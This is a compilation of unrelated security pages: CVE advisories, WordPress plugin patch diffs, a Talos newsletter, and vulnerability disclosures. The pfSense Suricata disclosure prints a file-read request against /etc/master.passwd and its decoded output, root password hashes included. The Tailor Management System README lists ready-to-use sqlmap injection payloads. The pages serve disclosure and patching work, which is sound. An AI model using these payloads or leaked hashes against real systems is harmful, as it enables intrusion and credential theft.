A vulnerability classified as problematic was found in phpMiniAdmin up to 1.8.120510. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 1.9.140405 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-225001 was assigned to this vulnerability.

CVE-2014-125094

The WP Fastest Cache plugin for WordPress is vulnerable to unauthorized data modification due to a missing capability check on the wpfc_purgecache_varnish_callback function in versions up to, and including, 1.1.2. This makes it possible for authenticated attackers with subscriber-level access to purge the varnish cache.

*   **wp-fastest-cache/trunk/wpFastestCache.php**
    
    r2886944
    
    r2893158
    
     
    
    410
    
    410
    
    411
    
    411
    
            public function wpfc\_preload\_single\_callback(){
    
     
    
    412
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    413
    
                    die( 'Security check' );
    
     
    
    414
    
                }
    
     
    
    415
    
    412
    
    416
    
                include\_once('inc/single-preload.php');
    
    413
    
    417
    
                SinglePreloadWPFC::create\_cache();
    
    …
    
    …
    
     
    
    425
    
    429
    
    426
    
    430
    
            public function wpfc\_preload\_single\_save\_settings\_callback(){
    
     
    
    431
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    432
    
                    die( 'Security check' );
    
     
    
    433
    
                }
    
     
    
    434
    
    427
    
    435
    
                include\_once('inc/single-preload.php');
    
    428
    
    436
    
                SinglePreloadWPFC::save\_settings();
    
    …
    
    …
    
     
    
    503
    
    511
    
    504
    
    512
    
            public function wpfc\_db\_statics\_callback(){
    
     
    
    513
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    514
    
                    die( 'Security check' );
    
     
    
    515
    
                }
    
     
    
    516
    
               
    
    505
    
    517
    
                global $wpdb;
    
    506
    
    518
    
    …
    
    …
    
     
    
    572
    
    584
    
    573
    
    585
    
            public function wpfc\_save\_cdn\_integration\_ajax\_request\_callback(){
    
     
    
    586
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'cdn-nonce')){
    
     
    
    587
    
                    die( 'Security check' );
    
     
    
    588
    
                }
    
     
    
    589
    
    574
    
    590
    
                include\_once('inc/cdn.php');
    
    575
    
    591
    
                CdnWPFC::save\_cdn\_integration();
    
    …
    
    …
    
     
    
    577
    
    593
    
    578
    
    594
    
            public function wpfc\_start\_cdn\_integration\_ajax\_request\_callback(){
    
     
    
    595
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'cdn-nonce')){
    
     
    
    596
    
                    die( 'Security check' );
    
     
    
    597
    
                }
    
     
    
    598
    
    579
    
    599
    
                include\_once('inc/cdn.php');
    
    580
    
    600
    
                CdnWPFC::start\_cdn\_integration();
    
    …
    
    …
    
     
    
    582
    
    602
    
    583
    
    603
    
            public function wpfc\_pause\_cdn\_integration\_ajax\_request\_callback(){
    
     
    
    604
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'cdn-nonce')){
    
     
    
    605
    
                    die( 'Security check' );
    
     
    
    606
    
                }
    
     
    
    607
    
    584
    
    608
    
                include\_once('inc/cdn.php');
    
    585
    
    609
    
                CdnWPFC::pause\_cdn\_integration();
    
    …
    
    …
    
     
    
    587
    
    611
    
    588
    
    612
    
            public function wpfc\_remove\_cdn\_integration\_ajax\_request\_callback(){
    
     
    
    613
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'cdn-nonce')){
    
     
    
    614
    
                    die( 'Security check' );
    
     
    
    615
    
                }
    
     
    
    616
    
               
    
    589
    
    617
    
                include\_once('inc/cdn.php');
    
    590
    
    618
    
                CdnWPFC::remove\_cdn\_integration();
    
    …
    
    …
    
     
    
    662
    
    690
    
    663
    
    691
    
            public function wpfc\_purgecache\_varnish\_callback(){
    
     
    
    692
    
                if(!wp\_verify\_nonce($\_REQUEST\["security"\], 'wpfc-varnish-ajax-nonce')){
    
     
    
    693
    
                    die( 'Security check' );
    
     
    
    694
    
                }
    
     
    
    695
    
    664
    
    696
    
                if($varnish\_datas = get\_option("WpFastestCacheVarnish")){
    
    665
    
    697
    
                    include\_once('inc/varnish.php');
    
    …
    
    …
    
     
    
    865
    
    897
    
    866
    
    898
    
            public function deleteCacheToolbar(){
    
     
    
    899
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    900
    
                    die( 'Security check' );
    
     
    
    901
    
                }
    
     
    
    902
    
    867
    
    903
    
                $this->deleteCache();
    
    868
    
    904
    
            }
    
    869
    
    905
    
    870
    
    906
    
            public function deleteCssAndJsCacheToolbar(){
    
     
    
    907
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    908
    
                    die( 'Security check' );
    
     
    
    909
    
                }
    
     
    
    910
    
               
    
    871
    
    911
    
                $this->deleteCache(true);
    
    872
    
    912
    
            }
    
    …
    
    …
    
     
    
    911
    
    951
    
    912
    
    952
    
            public function wpfc\_toolbar\_save\_settings\_callback(){
    
     
    
    953
    
                if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    954
    
                    die( 'Security check' );
    
     
    
    955
    
                }
    
     
    
    956
    
    913
    
    957
    
                if(current\_user\_can('manage\_options')){
    
    914
    
    958
    
                    if(is\_array($\_GET\["roles"\]) && !empty($\_GET\["roles"\])){
    
    …
    
    …
    
     
    
    939
    
    983
    
    940
    
    984
    
            public function wpfc\_clear\_cache\_of\_allsites\_callback(){
    
     
    
    985
    
     
    
    986
    
                if(defined('DOING\_AJAX') && DOING\_AJAX){
    
     
    
    987
    
                    if(!wp\_verify\_nonce($\_REQUEST\["nonce"\], 'wpfc')){
    
     
    
    988
    
                        die( 'Security check' );
    
     
    
    989
    
                    }
    
     
    
    990
    
                }
    
     
    
    991
    
    941
    
    992
    
                include\_once('inc/cdn.php');
    
    942
    
    993
    
                CdnWPFC::cloudflare\_clear\_cache();

CVE-2023-1929: Changeset 2893158 for wp-fastest-cache/trunk/wpFastestCache.php – WordPress Plugin Repository

Directory Traversal vulnerability found in Pfsense v.2.1.3 and Pfsense Suricata v.1.4.6 pkg v.1.0.1 allows a remote attacker to obtain sensitive information via the file parameter to suricata/suricata_logs_browser.php.

1.  \# Exploit Title: LFI(Local File Inclusion) vulnerability in Suricata 1.4.6 on Pfsense 2.1.3
    
2.  \# Date: 2014-05-21
    
3.  \# Software Link: https://www.pfsense.org/
    
4.  \# Version: 2.1.3
    
5.  \# Vendor: Pfsense
    
6.  \# Exploit Author: Vu Van Hieu - hieuvnuhcm@gmail.com, Nguyen Quoc Viet - vietnguyen@uns.vn
    
7.  \# CVE: CVE-2020-19678
    
8.  \# Category: IDS
    
9.  \# Tested on: Firefox
    

11.  \# Description
    
12.  \# There is a LFI(Local File Inclusion) vulnerability in Suricata 1.4.6 pkg v1.0.1 on Pfsense 2.1.3
    
13.  \# It allows attacker to include files on a server through the web browser, and read any files on server.
    
14.  \# The vulnerability allows remote attackers to retrieve arbitrary files via the file parameter to /suricata/suricata\_logs\_browser.php
    

16.  \# POC
    
17.  This is an POST HEADER when you access to https://Your\_Pfsense\_Server/suricata/suricata\_logs\_browser.php. You can modified "file" parameter to read any file(Example: /etc/master.passwd):
    
18.  \+ HTTP POST header:
    
19.  \`\`\`
    
20.  Host: Your\_Pfsense\_Server
    
21.  User-Agent: Mozilla/5.0
    
22.  Accept: \*/\*
    
23.  Accept-Language: en-us,en;q=0.5
    
24.  Accept-Encoding: gzip, deflate
    
25.  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    
26.  X-Requested-With: XMLHttpRequest
    
27.  Referer: https://Your\_Pfsense\_Server/suricata/suricata\_logs\_browser.php
    
28.  Content-Length: 132 Cookie: cookie\_test=1400576638; PHPSESSID=7d20151aeace555ee38d8d923f47c3aa
    
29.  Connection: keep-alive
    
30.  Pragma: no-cache
    
31.  Cache-Control: no-cache
    

33.  \_\_csrf\_magic=sid:4c06775fcb95114389a0da397f509158d261ea54,1400573055&action=load&file=/etc/master.passwd
    
34.  \`\`\`
    

36.  \+ The server will response Base64 Encoded data:
    
37.  \`\`\`
    
38.  |0|/etc/master.passwd|IyAkRnJlZUJTRDogc3JjL2V0Yy9tYXN0ZXIucGFzc3dkLHYgMS4zOSAyMDA0LzA4LzAxIDIxOjMzOjQ3IG1hcmttIEV4cCAkCiMKcm9vdDokMSRkU0pJbUZwaCRHdlo3LjFVYnVXdS5ZYjhldEMwcmUuOjA6MDo6MDowOkNoYXJsaWUgJjovcm9vdDovYmluL3NoCnRvb3I6KjowOjA6OjA6MDpCb3VybmUtYWdhaW4gU3VwZXJ1c2VyOi9yb290OgpkYWVtb246KjoxOjE6OjA6MDpPd25lciBvZiBtYW55IHN5c3RlbSBwcm9jZXNzZXM6L3Jvb3Q6L3Vzci9zYmluL25vbG9naW4Kb3BlcmF0b3I6KjoyOjU6OjA6MDpTeXN0ZW0gJjovOi91c3Ivc2Jpbi9ub2xvZ2luCmJpbjoqOjM6Nzo6MDowOkJpbmFyaWVzIENvbW1hbmRzIGFuZCBTb3VyY2U6LzovdXNyL3NiaW4vbm9sb2dpbgp0dHk6Kjo0OjY1NTMzOjowOjA6VHR5IFNhbmRib3g6LzovdXNyL3NiaW4vbm9sb2dpbgprbWVtOio6NTo2NTUzMzo6MDowOktNZW0gU2FuZGJveDovOi91c3Ivc2Jpbi9ub2xvZ2luCmdhbWVzOio6NzoxMzo6MDowOkdhbWVzIHBzZXVkby11c2VyOi91c3IvZ2FtZXM6L3Vzci9zYmluL25vbG9naW4KbmV3czoqOjg6ODo6MDowOk5ld3MgU3Vic3lzdGVtOi86L3Vzci9zYmluL25vbG9naW4KbWFuOio6OTo5OjowOjA6TWlzdGVyIE1hbiBQYWdlczovdXNyL3NoYXJlL21hbjovdXNyL3NiaW4vbm9sb2dpbgpzc2hkOio6MjI6MjI6OjA6MDpTZWN1cmUgU2hlbGwgRGFlbW9uOi92YXIvZW1wdHk6L3Vzci9zYmluL25vbG9naW4Kc21tc3A6KjoyNToyNTo6MDowOlNlbmRtYWlsIFN1Ym1pc3Npb24gVXNlcjovdmFyL3Nwb29sL2NsaWVudG1xdWV1ZTovdXNyL3NiaW4vbm9sb2dpbgptYWlsbnVsbDoqOjI2OjI2OjowOjA6U2VuZG1haWwgRGVmYXVsdCBVc2VyOi92YXIvc3Bvb2wvbXF1ZXVlOi91c3Ivc2Jpbi9ub2xvZ2luCmJpbmQ6Kjo1Mzo1Mzo6MDowOkJpbmQgU2FuZGJveDovOi91c3Ivc2Jpbi9ub2xvZ2luCnByb3h5Oio6NjI6NjI6OjA6MDpQYWNrZXQgRmlsdGVyIHBzZXVkby11c2VyOi9ub25leGlzdGVudDovdXNyL3NiaW4vbm9sb2dpbgpfcGZsb2dkOio6NjQ6NjQ6OjA6MDpwZmxvZ2QgcHJpdnNlcCB1c2VyOi92YXIvZW1wdHk6L3Vzci9zYmluL25vbG9naW4Kd3d3Oio6ODA6ODA6OjA6MDpXb3JsZCBXaWRlIFdlYiBPd25lcjovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4Kbm9ib2R5Oio6NjU1MzQ6NjU1MzQ6OjA6MDpVbnByaXZpbGVnZWQgdXNlcjovbm9uZXhpc3RlbnQ6L3Vzci9zYmluL25vbG9naW4KZGhjcGQ6KjoxMDAyOjEwMDI6OjA6MDpESENQIERhZW1vbjovbm9uZXhpc3RlbnQ6L3NiaW4vbm9sb2dpbgpfZGhjcDoqOjY1OjY1OjowOjA6ZGhjcCBwcm9ncmFtczovdmFyL2VtcHR5Oi91c3Ivc2Jpbi9ub2xvZ2luCl9pc2FrbXBkOio6Njg6Njg6OjA6MDppc2FrbXBkIHByaXZzZXA6L3Zhci9lbXB0eTovc2Jpbi9ub2xvZ2luCnV1Y3A6Kjo2Njo2Njo6MDowOlVVQ1AgcHNldWRvLXVzZXI6L3Zhci9zcG9vbC91dWNwcHVibGljOi91c3IvbG9jYWwvbGliZXhlYy91dWNwL3V1Y2ljbwpwb3A6Kjo2ODo2OjowOjA6UG9zdCBPZmZpY2UgT3duZXI6L25vbmV4aXN0ZW50Oi91c3Ivc2Jpbi9ub2xvZ2luCl9udHA6KjoxMjM6MTIzOjowOjA6TlRQIGRhZW1vbjovdmFyL2VtcHR5Oi9zYmluL25vbG9naW4KX3JlbGF5ZDoqOjkxMzo5MTM6OjA6MDpSZWxheSBEYWVtb246L3Zhci9lbXB0eTovdXNyL3NiaW4vbm9sb2dpbgphZG1pbjokMSRkU0pJbUZwaCRHdlo3LjFVYnVXdS5ZYjhldEMwcmUuOjA6MDo6MDowOlN5c3RlbSBBZG1pbmlzdHJhdG9yOi9yb290Oi9ldGMvcmMuaW5pdGlhbAp0ZXN0OipMT0NLRUQqJDEkTWoxY0RpdDIkQUpoZVlBalV1ZXIwa2dUWHd6dXRzLzoyMDAwOjY1NTM0OjowOjA6Oi9ob21lL3Rlc3Q6L3NiaW4vbm9sb2dpbgo=|
    
39.  \`\`\`
    

41.  \+ Decode the content in Base64:
    
42.  \`\`\`
    
43.  \# $FreeBSD: src/etc/master.passwd,v 1.39 2004/08/01 21:33:47 markm Exp $
    
44.  #
    
45.  root:$1$dSJImFph$GvZ7.1UbuWu.
    
46.  Yb8etC0re.:0:0::0:0:Charlie &:/root:/bin/sh
    
47.  toor:\*:0:0::0:0:Bourne-again Superuser:/root:
    
48.  daemon:\*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
    
49.  operator:\*:2:5::0:0:System &:/:/usr/sbin/nologin
    
50.  bin:\*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
    
51.  tty:\*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
    
52.  kmem:\*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
    
53.  games:\*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
    
54.  news:\*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
    
55.  man:\*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
    
56.  sshd:\*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
    
57.  smmsp:\*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
    
58.  mailnull:\*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
    
59.  bind:\*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
    
60.  proxy:\*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
    
61.  \_pflogd:\*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
    
62.  www:\*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
    
63.  nobody:\*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
    
64.  dhcpd:\*:1002:1002::0:0:DHCP Daemon:/nonexistent:/sbin/nologin
    
65.  \_dhcp:\*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
    
66.  \_isakmpd:\*:68:68::0:0:isakmpd privsep:/var/empty:/sbin/nologin
    
67.  uucp:\*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
    
68.  pop:\*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
    
69.  \_ntp:\*:123:123::0:0:NTP daemon:/var/empty:/sbin/nologin
    
70.  \_relayd:\*:913:913::0:0:Relay Daemon:/var/empty:/usr/sbin/nologin
    
71.  admin:$1$dSJImFph$GvZ7.1UbuWu.Yb8etC0re.:0:0::0:0:System Administrator:/root:/etc/rc.initial
    
72.  test:\*LOCKED\*$1$Mj1cDit2$AJheYAjUuer0kgTXwzuts/:2000:65534::0:0::/home/test:/sbin/nologin
    
73.  \`\`\`
    

75.  #REF
    
76.  https://github.com/pfsense/pfsense-packages/pull/659
    
77.  https://github.com/pfsense/pfsense-packages/commit/59ed3438729fd56452f58a0f79f0c288db982ac3
    
78.  http://www.2ngon.com/2015/01/lfi-vulnerability-suricata-146-pkg-v101.html

CVE-2020-19678: LFI vulnerability in Suricata 1.4.6 on Pfsense 2.1.3 - Pastebin.com

Be prepared to discuss difficult topics with potential new third-party software vendors, such as incident notification requirements, access to logs during a security incident and who the important emergency contacts are.

Thursday, April 6, 2023 14:04

Welcome to this week’s edition of the Threat Source newsletter.

It seems like we can’t go a full calendar year without a major supply chain attack. In late 2020 we had the SolarWinds incident (which, doesn’t that somehow seem like five years ago but also yesterday?), then the REvil ransomware group infiltrating the Kaseya VSA software in the summer of 2021 and last week we had another attack targeting the 3CX Desktop Softphone application.

For now, the adversaries behind the 3CX supply chain attack seem mainly focused on infiltrating cryptocurrency-related companies and exchanges to steal money. But we’ve still yet to see the full scale of this attack — the 3CX website claims to have over 600,000 customers and 12 million daily users. In the company’s latest update on the security incident, 3CX said the “incident was carried out by a highly experienced and knowledgeable hacker.”

So even though we’ve been talking about the importance of defending against supply chain attacks for three years now, I felt like this was a good place to round up all the information Talos has available on preparing for and preventing supply chain attacks. Here are a few tips with some handy links:

*   If your organization is specifically affected by the 3CX supply chain attack, Cisco Secure and Talos have a range of detection available across the Cisco portfolio. 3CX also has instructions for uninstalling the affected desktop application on its website.
*   Be prepared to discuss difficult topics with potential new third-party software vendors, such as incident notification requirements, access to logs during a security incident and who the important emergency contacts are. Talos Incident Response has a full list of these questions in this blog.
*   Take an inventory of the SaaS applications your organization uses and document their business use case and relevant access authorizations. Nick Biasini and I talk about the importance of asset management in this episode of Talos Takes right after the SolarWinds incident.
*   Implement a zero-trust approach to security so that your organization verifies every access attempt. This also means only assigning the appropriate rights to each user on a network that they need to do their job.
*   Create an incident response plan and/or playbook so your organization is ready to respond in the event of a supply chain attack. Cisco Talos Incident Response can help with that.

**The one big thing**

The developer of the Typhon Reborn information stealer recently released an updated version (V2) that includes significant updates to its codebase and improved capabilities. Most notably, the new version features additional anti-analysis and anti-virtual machine (VM) capabilities to evade detection and make analysis more difficult.

**Why do I care?**

Once on an infected machine, the stealer can harvest and exfiltrate sensitive information and uses the Telegram API to send stolen data to attackers. This can include highly sensitive data, such as login information to cryptocurrency wallets and exchanges, VPN clients and email and messaging clients. The latest version of the stealer is available on dark web forums for a relatively low price in comparison to other information stealers, so Talos researchers suspect this malware will pop up in cyber attacks going forward.

**So now what?**

The Talos blog has a full rundown of the Cisco Secure detection capabilities in place to prevent the execution of this malware and alert users if it’s on their network.

**Top security headlines of the week**

While the proposed “RESTRICT Act” in U.S. Congress is widely known as the “TikTok ban,” it would **actually do much more than restrict the popular social media app in the U.S.** Critics of the bill say, if passed, it would give the Executive Branch greater control over the online marketplace and potentially restrict the sale of other software that could be viewed as potentially dangerous like VPNs that consumers use to encrypt and route their traffic. The White House is in favor of the bill, saying that it would protect American national security by restricting data collection from foreign governments. However, the language of the bill only says it would restrict software from countries identified as a “foreign adversary,” which currently includes China, Cuba, Iran, North Korea, Russia and Venezuela. (Vice, The Electronic Frontier Foundation)

International law enforcement agencies **seized several domain names tied to Genesis Market,** a popular cybercrime store, on Wednesday, while also arresting some of its alleged administrators. Genesis Market was known to sell access to stolen passwords and other data. Customers who purchased this information could load the victim’s authentication cookies into their web browser to access their online accounts without needing a password and sometimes bypass multi-factor authentication. Arrest warrants were reportedly out for several individuals involved in the marketplace in the U.S., Canada and Europe. During a series of raids this week, the UK's National Crime Agency (NCA) arrested 24 people who are suspected users of the site. (BBC News, Krebs on Security)

**Online alcohol recovery startups Monument and Tempest were mistakenly sharing users’ health information** and data with third-party advertisers for years without their consent, according to a data breach notification filed with California’s attorney general. Monument, which acquired Tempest last year, assists customers in dealing with and recovering from alcohol abuse, including offering online counseling, an anonymous forum and the ability to prescribe medication. The company said in the filing that they were mistakenly sharing information through third-party ad tracking systems such as those from Google and Meta. The data shared with advertisers included patients’ photos, the answers to online questionnaires about their health and alcohol use, personally identifiable information (PII) and their insurance providers. (TechCrunch, The Verge)

**Can’t get enough Talos?**

*   Talos Takes Ep. #133: The defensive and offensive implications of ChatGPT and AI
*   Vulnerability Spotlight: Buffer overflow vulnerability in ADMesh library
*   Threat Roundup for March 24 - 31
*   Vulnerability Spotlight: Vulnerability in ManageEngine OpManager could lead to XXE attack
*   Typhon Reborn Stealer Malware Resurfaces with Advanced Evasion Techniques

**Upcoming events where you can find Talos**

**RSA** **(April 24 - 27)**

San Francisco, CA

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** e248b01e3ccde76b4d8e8077d4fcb4d0b70e5200bf4e738b45a0bd28fbc2cae6  
**MD5:** 1e2a99ae43d6365148d412b5dfee0e1c  
**Typical Filename:** PDFpower.exe  
**Claimed Product:** PdfPower  
**Detection Name:** Win32.Adware.Generic.SSO.TALOS

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423  
**MD5:** 954a5fc664c23a7a97e09850accdfe8e  
**Typical Filename:** teams15.exe  
**Claimed Product:** teams15  
**Detection Name:** Gen:Variant.MSILHeracles.59885

**SHA 256:** c74e7421f2021b46ee256e5f02d94c1bce15da107c8c997c611055412de1ac1  
**MD5:** 2d16d0af6183803a79d9ef5c744286c4  
**Typical Filename:** nano\_download.php  
**Claimed Product:** Web Companion Installer  
**Detection Name:** W32.1C74E7421F-100.SBX.VIOC

Threat Source newsletter (April 6, 2023) — Another friendly reminder about supply chain attacks

SQL injection vulnerability found in Tailor Management System v.1 allows a remote authenticated attacker to execute arbitrary code via the customer parameter of the email.php page.

**CVE-s + Tailor Management System V.1**

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > as you can see in email.php line 50 $result = $pdo->query("SELECT email FROM customer WHERE fullname='$customer'"); the parameter "$customer" is not filtered ,and without prepare statement .

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > you have to be authenticated , go to email.php file and full all the inputs with the necessary information, intercept the request using burp suite, and in the request you will see the method is post and the customer parameter will be exploitable , you will save the request and using sqlmap to exploit the vulnerability . Parameter: #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=0' AND (SELECT 2532 FROM (SELECT(SLEEP(5)))ZLDl) AND 'Dfud'='Dfud&template=Your Clothes are ready for collection. Thanks for your patronage&message=Dear 0, Your Clothes are ready for collection. Thanks for your patronage

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code, $oldd = $pdo->query("SELECT \* FROM customer WHERE id='".$eid."'"); line 90 $eid = $\_GET\["id"\]; line 41 no validation found while execution the query

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > after login navigate the this page : http://localhost/tailor/customeredit.php , and edit the user data you will see the parameter reflected in url like this : http://localhost/tailor/customeredit.php?id=1 , using the sqlmap with this link you should see the following Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 8449=8449 AND 'iurJ'='iurJ Type: time-based blind Title: MySQL < 5.0.12 OR time-based blind (heavy query) Payload: id=1' OR 3412=BENCHMARK(5000000,MD5(0x67504658)) AND 'Vzxv'='Vzxv Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: id=-2894' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171787671,0x526c664b74446c5277577653754f7146475152747377417975734579655658764766626e6869694a,0x7178787671),NULL,NULL-- pUIM

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code in document.php from line 43 to line 57 ( $detail = $\_POST\["detail"\]; ) ,execute the query in line 57 $res = $pdo->exec("INSERT INTO documents SET title='".$title."', detail='".$detail."', img='".$bgimg."'");

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > login and go http://localhost/tailor/document.php , set the document title and send the request , by intercept the request using burp suite and save the request and send it request to sqlmap this will confirm the vulnerability exist Parameter: MULTIPART #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="title" ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="detail" aa' AND (SELECT 2393 FROM (SELECT(SLEEP(5)))JGfe) AND 'keIn'='keIn ------WebKitFormBoundaryvizUXbIL1AEu2VY4 Content-Disposition: form-data; name="bgimg"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryvizUXbIL1AEu2VY4--

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > by reviewing the source code in document.php from line 42 to line 57 ( $title = $\_POST\["title"\]; ) ,execute the query in line 57 $res = $pdo->exec("INSERT INTO documents SET title='".$title."', detail='".$detail."', img='".$bgimg."'");

> \[Attack Type\]
> 
> > Remote

> \[Discoverer\]
> 
> > Abdallah Fouad , Bassam Assiri

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

> \[Vulnerability Type\]
> 
> > SQL Injection

> \[Affected Component\]
> 
> > After reviewing the source code for the software, I found that in orderadd.php file using unsafe way to insert the data from the requests without any validation. from line number 45 (the query ),and execute the query in line 54.

> \[Attack Type\]
> 
> > Remote

> \[Attack Vectors\]
> 
> > after login go to http://localhost:8080/tailor/tailor/orderadd.php page , then full out all the form , intercept the request by using burp suite and by using sqlmap with inject able point from the POST request { customer=_&desc=test&date\_received=&amount=1&paid=1&completed=Yes&date\_collected=2020-12-26 } , the customer. sqlmap data : (custom) POST parameter '#1_' is vulnerable. Do you want to keep testing the others (if any)? \[y/N\] N sqlmap identified the following injection point(s) with a total of 93 HTTP(s) requests: --- Parameter: #1\* ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: customer=' AND (SELECT 9665 FROM (SELECT(SLEEP(5)))QEDW) AND 'dcCY'='dcCY&desc=
> > 
> > X&date\_receiv ed=&amount=1&paid=1&completed=Yes&date\_collected=2020-12-26 ==================================================================================--------

> \[Discoverer\]
> 
> > Abdallah Fouad Mohamed

> \[Vendor of Product\]
> 
> > SourceCodester

> \[Affected Product Code Base\]
> 
> > Tailor Management System V.1

RISK: High

Impact: he impact SQL injection can have on a business is far-reaching. A successful attack may result in the unauthorized viewing of user lists, the deletion of entire tables and, in certain cases, the attacker gaining administrative rights to a database, all of which are highly detrimental to a business.

CVE-2020-36071: CVE-s/README.md at main · Abdallah-Fouad-X/CVE-s

The Maps Widget for Google Maps for WordPress is vulnerable to Stored Cross-Site Scripting via widget settings in versions up to, and including, 4.24 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.

**google-maps-widget/trunk/gmw-widget.php**

r2876127

r2893821

 

454

454

    }

455

455

456

 

    $instance\['title'\] = $new\_instance\['title'\];

457

 

    $instance\['address'\] = strip\_tags(trim($new\_instance\['address'\]));

458

 

459

 

    $instance\['thumb\_pin\_type'\] = $new\_instance\['thumb\_pin\_type'\];

460

 

    $instance\['thumb\_pin\_color'\] = GMW::sanitize\_hex\_color(@$new\_instance\['thumb\_pin\_color'\]);

461

 

    $instance\['thumb\_pin\_size'\] = $new\_instance\['thumb\_pin\_size'\];

462

 

    $instance\['thumb\_pin\_label'\] = $new\_instance\['thumb\_pin\_label'\];

463

 

    $instance\['thumb\_pin\_img'\] = trim($new\_instance\['thumb\_pin\_img'\]);

 

456

    $instance\['title'\] = sanitize\_text\_field($new\_instance\['title'\]);

 

457

    $instance\['address'\] = sanitize\_text\_field(trim($new\_instance\['address'\]));

 

458

 

459

    $instance\['thumb\_pin\_type'\] = sanitize\_text\_field($new\_instance\['thumb\_pin\_type'\]);

 

460

    $instance\['thumb\_pin\_color'\] = GMW::sanitize\_hex\_color(sanitize\_text\_field(@$new\_instance\['thumb\_pin\_color'\]));

 

461

    $instance\['thumb\_pin\_size'\] = sanitize\_text\_field($new\_instance\['thumb\_pin\_size'\]);

 

462

    $instance\['thumb\_pin\_label'\] = sanitize\_text\_field($new\_instance\['thumb\_pin\_label'\]);

 

463

    $instance\['thumb\_pin\_img'\] = sanitize\_text\_field(trim($new\_instance\['thumb\_pin\_img'\]));

464

464

    $instance\['thumb\_width'\] = min(640, max(50, (int) $new\_instance\['thumb\_width'\]));

465

465

